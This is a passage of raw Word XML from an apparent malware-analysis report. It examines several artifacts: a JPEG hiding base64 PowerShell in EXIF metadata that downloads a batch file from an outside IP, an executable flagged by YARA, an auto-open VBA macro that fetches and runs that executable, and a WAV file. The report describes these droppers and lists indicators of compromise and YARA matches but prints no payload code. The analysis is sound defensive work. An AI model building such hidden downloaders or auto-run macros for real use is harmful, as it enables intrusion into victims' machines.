          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">
      <w:pPr>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---DECODED</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END---</w:t>
      </w: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0"/>
        <w:tblW w:w="93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5"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9315"/>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Frontpage.jpg </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">was flagged by multiple YARA rules. Upon further investigation, it was discovered that embedded within its EXIF metadata are two identical base64-encoded PowerShell commands that, when decoded, reveal a downloader script designed to fetch a batch file (`asefa.bat`) from the remote IP address `108.181.155.31` and save it to `C:\ProgramData\asefa.bat`. This behavior is characteristic of a dropper used to deploy second-stage malware. The use of steganography to conceal these commands within image metadata demonstrates a sophisticated evasion technique. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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widowControl w:val="0"/>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To summarize, the base-64 encoded content of the file:</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>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Downloads a malicious batch file (asefa.bat) from a remote server at IP 108.181.155.31</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000155">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="2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Saves it to c:\programdata\asefa.bat</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000156">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="2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Uses PowerShell's invoke-webrequest to fetch the payload</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000157">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Indicators of Compromise (IOCs) are: </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000159">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Malicious IP: 108.181.155.31</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015A">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Malicious File: asefa.bat</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015B">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Drop Location: c:\programdata\asefa.bat</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015C">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Technique: EXIF metadata steganography with base64 encoding</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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Such encoded content leads us to conclude that the file `frontpage.jpg` is malicious</w:t>
            </w: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15F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v2hzkdi9qfn6" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000160">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w12xfxq7yk37" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🚨 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Artifact #3: image_downloader.exe </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000161">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="073763"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">YARA File Artifacts:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000162">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Persistence techniques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3">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0x1d665:$startup: Startup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000164">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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UnusualNumOfExports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000165">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YaraFile Empty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000166">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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SuspiciousDLLSectionCount:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000167">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0x9dec:$dll_id1: .dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000168">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0x9ea6:$dll_id1: .dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000169">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0x9ec3:$dll_id1: .dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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SuspiciousSYSSectionCount:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016B">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0x7a35: $http: http://</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016C">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0x7a71: $http: http://</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016D">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0x7a79:$https: https://</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016E">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0x7a3c:$ipv4: 165.73.244.11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016F">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0x7a3d:$ipv4: 65.73.244.11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000170">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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0x7a3e:$ipv4: 5.73.244.11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table11"/>
        <w:tblW w:w="933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30"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="933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of</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> image_downloader.exe</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> revealed several potentially suspicious characteristics. The presence of both HTTP and HTTPS strings, along with direct IP addresses, suggests that the file may initiate or manage network communication. Such behavior is commonly associated with downloader malware. Additionally, references to `.dll` and `.sys` sections may indicate dynamic linking or system-level interaction, which are typical in executables that retrieve or manipulate external resources. A string related to “startup” was also flagged, though this appears to be a static match rather than definitive evidence of a persistence mechanism.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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absence of obfuscation, packing, or complex export activity, the combination of network indicators and system-level references raises concern. While some of these traits could be present in a benign downloader, further investigation (</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">particularly insights from Artifact #4</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">) prompted a reassessment. </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Based on all available evidence, image_downloader.exe was concluded to be malicious.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000176">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_koubx7ct4fhs" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🚨 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Artifact #4: SecurityAdvisory.docm </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000177">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="073763"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="073763"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BrowMal Artifacts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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is set to auto-open and creates a “Microsoft.XMLHTTP” object and a “Adodb.Stream” object before downloading and running “image_downloader.exe”, from 192.168.1.2 [a local IP address], in a shell terminal. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See the image below. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000179">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909888" cy="3310132"/>
            <wp:effectExtent b="38100" l="38100" r="38100" t="38100"/>
            <wp:docPr id="3" name="image9.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2909888" cy="3310132"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="38100">
                      <a:solidFill>
                        <a:srgbClr val="295278"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017B">
      <w:pPr>
        <w:ind w:lef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ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="295278"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="295278"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yara Malicious_Office_AutoOpen_Macro.yar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="295278"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="295278"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2019300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10" name="image11.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image11.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2019300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="295278"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table12"/>
        <w:tblW w:w="958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85"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9585"/>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SecurityAdvisory.docm </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">contains a definitely malicious VBA macro configured to execute automatically. The `AutoOpen()` routine instantiates an `XMLHTTP` object to download </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">image_downloader.exe</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> from `http://192.168.1.2`, then uses an `Adodb.Stream` to write the payload to `C:\Windows\Temp\image_downloader.exe`. Finally, </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">the macro</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> launches the downloaded binary using a shell call. </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">This sequence demonstrates clear downloader behavior and confirms that SecurityAdvisory.docm is a malicious document</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> designed to automatically retrieve and execute</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> image_downloader.exe</w:t>
            </w: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180">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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zfpjkdxliaoo" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>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Artifact #5: volt.wav </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000183">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="073763"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">YARA File Artifacts:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000184">
      <w:pPr>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HighEntropySection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000185">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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0x40b4:$packer3: SR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000186">
      <w:pPr>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JPG_ImageTypeTest:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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0x0:$jpg_magic: FF D8 FF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000188">
      <w:pPr>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JPEG_ImageChecker:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000189">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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0x0:$jpeg_header: FF D8 FF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018A">
      <w:pPr>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WAV_FileTypeCheck.yara</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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None Found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table13"/>
        <w:tblW w:w="958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85"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9585"/>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of </w:t>
            </w:r>
